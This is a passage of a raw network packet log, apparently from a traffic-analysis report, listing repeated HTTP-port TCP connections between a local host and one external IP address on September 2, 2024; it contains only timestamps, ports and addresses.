                                                            Sep 2, 2024 13:35:28.068018913 CEST4986180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:28.072439909 CEST804986080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:28.072633028 CEST4986080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:28.072803974 CEST804986180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:28.072879076 CEST4986180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:28.072973967 CEST4986180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:28.077756882 CEST804986180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:28.431092024 CEST4986180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:28.436095953 CEST804986180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:28.532619953 CEST4986280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:28.537558079 CEST804986280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:28.537633896 CEST4986280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:28.537966967 CEST4986280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:28.542977095 CEST804986280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:28.739867926 CEST804986180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:28.790405989 CEST4986180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:28.872951031 CEST804986180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:28.884207964 CEST4986280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:28.889065981 CEST804986280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:28.889153957 CEST804986280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:28.915431976 CEST4986180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:28.991147995 CEST4986180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:28.991930008 CEST4986380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:28.996432066 CEST804986180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:28.996766090 CEST4986180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:28.996835947 CEST804986380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:29.000427961 CEST4986380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:29.000529051 CEST4986380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:29.005589962 CEST804986380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:29.204227924 CEST804986280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:29.337064028 CEST804986280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:29.337126017 CEST4986280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:29.352982998 CEST4986380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:29.357848883 CEST804986380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:29.670289040 CEST804986380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:29.715266943 CEST4986380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:29.796789885 CEST804986380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:29.837301970 CEST4986380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:29.911202908 CEST4986280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:29.911271095 CEST4986380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:29.912020922 CEST4986480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:29.916331053 CEST804986280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:29.916416883 CEST4986280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:29.916675091 CEST804986380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:29.916718006 CEST4986380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:29.916795969 CEST804986480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:29.916856050 CEST4986480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:29.917018890 CEST4986480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:29.921744108 CEST804986480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:30.274939060 CEST4986480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:30.280132055 CEST804986480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:30.593986988 CEST804986480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:30.634152889 CEST4986480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:30.722673893 CEST804986480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:30.774782896 CEST4986480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:30.854028940 CEST4986480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:30.855556965 CEST4986580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:30.859297991 CEST804986480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:30.859342098 CEST4986480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:30.860493898 CEST804986580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:30.860610008 CEST4986580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:30.860719919 CEST4986580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:30.865484953 CEST804986580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:31.212620020 CEST4986580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:31.217530966 CEST804986580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:31.526457071 CEST804986580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:31.571645021 CEST4986580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:31.653557062 CEST804986580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:31.696652889 CEST4986580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:31.772265911 CEST4986580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:31.773214102 CEST4986680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:31.777755022 CEST804986580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:31.777801991 CEST4986580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:31.777955055 CEST804986680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:31.778100967 CEST4986680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:31.778268099 CEST4986680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:31.783114910 CEST804986680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:32.134522915 CEST4986680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:32.139446020 CEST804986680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:32.426858902 CEST804986680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:32.477905035 CEST4986680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:32.554069996 CEST804986680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:32.602901936 CEST4986680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:32.682435036 CEST4986680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:32.683191061 CEST4986780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:32.688982010 CEST804986780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:32.689038992 CEST4986780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:32.689176083 CEST4986780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:32.689321995 CEST804986680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:32.689366102 CEST4986680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:32.693928957 CEST804986780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:33.040501118 CEST4986780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:33.045488119 CEST804986780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:33.342063904 CEST804986780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:33.399776936 CEST4986780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:33.469996929 CEST804986780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:33.511828899 CEST4986780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:33.583192110 CEST4986780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:33.584001064 CEST4986880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:33.588418961 CEST804986780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:33.588485956 CEST4986780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:33.588766098 CEST804986880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:33.588833094 CEST4986880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:33.588916063 CEST4986880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:33.593883038 CEST804986880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:33.964642048 CEST4986880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:33.969696999 CEST804986880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:34.234487057 CEST804986880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:34.306046009 CEST4986880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:34.357059956 CEST804986880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:34.427572966 CEST4986880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:34.434254885 CEST4986880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:34.440586090 CEST804986880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:34.526417017 CEST4986980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:34.531914949 CEST804986980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:34.532027006 CEST4986980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:34.532282114 CEST4986980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:34.537503004 CEST804986980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:34.635210991 CEST804986880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:34.638443947 CEST4986880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:34.643335104 CEST804986880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:34.643428087 CEST804986880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:34.884443998 CEST4986980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:34.998100042 CEST804986980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:35.183403969 CEST804986980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:35.258191109 CEST804986880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:35.274802923 CEST4986980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:35.394862890 CEST804986980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:35.399804115 CEST4986880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:35.521996975 CEST4986880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:35.522068977 CEST4986980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:35.523005962 CEST4987080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:35.527623892 CEST804986880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:35.527718067 CEST4986880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:35.527951956 CEST804986980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:35.527997971 CEST4986980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:35.528131008 CEST804987080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:35.528193951 CEST4987080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:35.528321028 CEST4987080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:35.534241915 CEST804987080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:35.884314060 CEST4987080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:35.889309883 CEST804987080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:36.177639961 CEST804987080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:36.290421963 CEST4987080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:36.396120071 CEST804987080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:36.522661924 CEST4987080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:36.523492098 CEST4987180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:36.527942896 CEST804987080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:36.528003931 CEST4987080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:36.528290033 CEST804987180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:36.528361082 CEST4987180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:36.528453112 CEST4987180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:36.533612013 CEST804987180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:36.884514093 CEST4987180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:36.889553070 CEST804987180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:37.192662001 CEST804987180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:37.274807930 CEST4987180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:37.320971012 CEST804987180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:37.384167910 CEST4987180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:37.443310022 CEST4987180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:37.444030046 CEST4987280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:37.448535919 CEST804987180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:37.448622942 CEST4987180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:37.448831081 CEST804987280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:37.448914051 CEST4987280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:37.451905012 CEST4987280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:37.456749916 CEST804987280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:37.806154966 CEST4987280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:37.811109066 CEST804987280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:38.094038963 CEST804987280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:38.274801970 CEST4987280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:38.298681974 CEST804987280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:38.384202003 CEST4987280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:38.411753893 CEST4987380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:38.411758900 CEST4987280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:38.416806936 CEST804987380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:38.417220116 CEST804987280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:38.418363094 CEST4987380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:38.418365002 CEST4987280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:38.420145035 CEST4987380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:38.425118923 CEST804987380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:38.778358936 CEST4987380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:38.783301115 CEST804987380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:39.063173056 CEST804987380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:39.186348915 CEST4987380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:39.189219952 CEST804987380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:39.303591013 CEST4987380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:39.304267883 CEST4987480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:39.308790922 CEST804987380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:39.308852911 CEST4987380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:39.309030056 CEST804987480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:39.309083939 CEST4987480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:39.309196949 CEST4987480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:39.313983917 CEST804987480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:39.674917936 CEST4987480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:39.679868937 CEST804987480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:39.982764006 CEST804987480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.088299990 CEST4987480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.114883900 CEST804987480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.252813101 CEST4987480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.256516933 CEST4987580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.258327007 CEST804987480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.258409977 CEST4987480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.260684967 CEST4987680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.262222052 CEST804987580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.262372017 CEST4987580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.262665987 CEST4987580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.266468048 CEST804987680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.268291950 CEST804987580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.268368006 CEST4987680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.269515991 CEST4987680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.274255037 CEST804987680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.618822098 CEST4987680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.618944883 CEST4987580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.624754906 CEST804987680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.624771118 CEST804987680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.624782085 CEST804987580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.920399904 CEST804987580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.920420885 CEST804987680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.993563890 CEST4987580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.993566036 CEST4987680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.049166918 CEST804987580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:41.053333044 CEST804987680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:41.102912903 CEST4987580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.102927923 CEST4987680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.162889957 CEST4987580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.162940979 CEST4987680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.163851023 CEST4987780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.168160915 CEST804987580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:41.168231010 CEST4987580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.168576956 CEST804987680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:41.168627024 CEST4987680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.170185089 CEST804987780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:41.170237064 CEST4987780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.170368910 CEST4987780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.177217007 CEST804987780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:41.524825096 CEST4987780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.584506989 CEST804987780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:41.844887018 CEST804987780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:41.966924906 CEST804987780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:41.967051029 CEST4987780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:42.103847027 CEST4987880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:42.103847027 CEST4987780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:42.108760118 CEST804987880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:42.109095097 CEST804987780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:42.109200001 CEST4987880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:42.109200001 CEST4987780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:42.109360933 CEST4987880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:42.117547035 CEST804987880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:42.464344978 CEST4987880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:42.469253063 CEST804987880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:42.766242027 CEST804987880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:42.890738010 CEST804987880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:42.894380093 CEST4987880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.021466970 CEST4987980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.021467924 CEST4987880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.031483889 CEST804987980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:43.031563997 CEST4987980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.031779051 CEST4987980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.031892061 CEST804987880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:43.032084942 CEST4987880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.050283909 CEST804987980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:43.384490967 CEST4987980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.389369011 CEST804987980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:43.693470955 CEST804987980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:43.790448904 CEST4987980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.821547985 CEST804987980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:43.975646973 CEST4987980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.976268053 CEST4988080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.981197119 CEST804987980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:43.981292009 CEST4987980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.981374979 CEST804988080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:43.981441975 CEST4988080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.981528997 CEST4988080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.986284971 CEST804988080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:44.338293076 CEST4988080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:44.343334913 CEST804988080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:44.638926029 CEST804988080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:44.769257069 CEST804988080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:44.769435883 CEST4988080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:44.894640923 CEST4988080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:44.895453930 CEST4988180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:45.290424109 CEST4988080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:45.899821043 CEST4988180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:45.943972111 CEST804988180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:45.943989038 CEST804988080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:45.944000006 CEST804988180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:45.944091082 CEST4988180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:45.944224119 CEST804988080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:45.944256067 CEST4988180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:45.944278002 CEST4988080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:45.944703102 CEST4988180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:45.952299118 CEST804988180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.075561047 CEST4988280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:46.080638885 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.080770969 CEST4988280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:46.080957890 CEST4988280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:46.085735083 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.291327953 CEST4988180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:46.296268940 CEST804988180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.431241989 CEST4988280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:46.436551094 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.436764956 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.596846104 CEST804988180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.723119020 CEST804988180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.723227024 CEST4988180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:46.728918076 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.793389082 CEST4988280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:46.855777025 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.858948946 CEST4988180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:46.858948946 CEST4988280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:46.863748074 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.863997936 CEST804988180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.864186049 CEST4988180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:47.061305046 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:47.061549902 CEST4988280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:47.067045927 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:47.365511894 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:47.477931023 CEST4988280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:47.492717981 CEST4988280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:47.493535995 CEST4988380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:47.498651981 CEST804988380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:47.498779058 CEST4988380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:47.498845100 CEST4988380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:47.498966932 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:47.499042988 CEST4988280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:47.503698111 CEST804988380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:47.853002071 CEST4988380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:47.857902050 CEST804988380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:48.164413929 CEST804988380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:48.289160013 CEST804988380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:48.289303064 CEST4988380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:48.410298109 CEST4988380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:48.410628080 CEST4988480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:48.415419102 CEST804988480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:48.415491104 CEST804988380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:48.415529966 CEST4988480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:48.415719986 CEST4988480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:48.417218924 CEST4988380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:48.420494080 CEST804988480.211.144.156192.168.2.6
